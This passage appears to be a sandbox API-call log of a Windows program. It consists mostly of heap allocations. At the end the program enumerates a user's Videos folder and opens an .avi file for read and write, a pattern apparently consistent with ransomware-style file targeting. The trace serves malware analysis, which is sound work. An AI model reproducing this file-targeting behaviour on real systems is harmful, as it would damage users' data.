Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.025] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.026] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.026] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.027] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.027] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.028] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.028] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.029] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.029] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.030] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\") returned="gOI6FhRK7 r-pcVYvKd\\" [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.030] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b512c8 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.030] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0172.030] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.030] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b512c8 | out: hHeap=0xcd0000) returned 1 [0172.030] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0172.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.031] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0172.031] PathFindFileNameW (pszPath="") returned="" [0172.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a3699e0, ftCreationTime.dwHighDateTime=0x1d5dc09, ftLastAccessTime.dwLowDateTime=0xa8ee3ff0, ftLastAccessTime.dwHighDateTime=0x1d5e01c, ftLastWriteTime.dwLowDateTime=0xa8ee3ff0, ftLastWriteTime.dwHighDateTime=0x1d5e01c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0172.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.031] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a3699e0, ftCreationTime.dwHighDateTime=0x1d5dc09, ftLastAccessTime.dwLowDateTime=0xa8ee3ff0, ftLastAccessTime.dwHighDateTime=0x1d5e01c, ftLastWriteTime.dwLowDateTime=0xa8ee3ff0, ftLastWriteTime.dwHighDateTime=0x1d5e01c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.031] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb127aa10, ftCreationTime.dwHighDateTime=0x1d5d952, ftLastAccessTime.dwLowDateTime=0x5ab96e40, ftLastAccessTime.dwHighDateTime=0x1d5e805, ftLastWriteTime.dwLowDateTime=0x5ab96e40, ftLastWriteTime.dwHighDateTime=0x1d5e805, nFileSizeHigh=0x0, nFileSizeLow=0xd926, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-2WcrB3nB4LDZ.avi", cAlternateFileName="-2WCRB~1.AVI")) returned 1 [0172.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.031] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xbe) returned 0x3609e18 [0172.031] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2e9d0 | out: hHeap=0xcd0000) returned 1 [0172.031] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\-2WcrB3nB4LDZ.avi") returned=".avi" [0172.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\-2WcrB3nB4LDZ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\-2wcrb3nb4ldz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 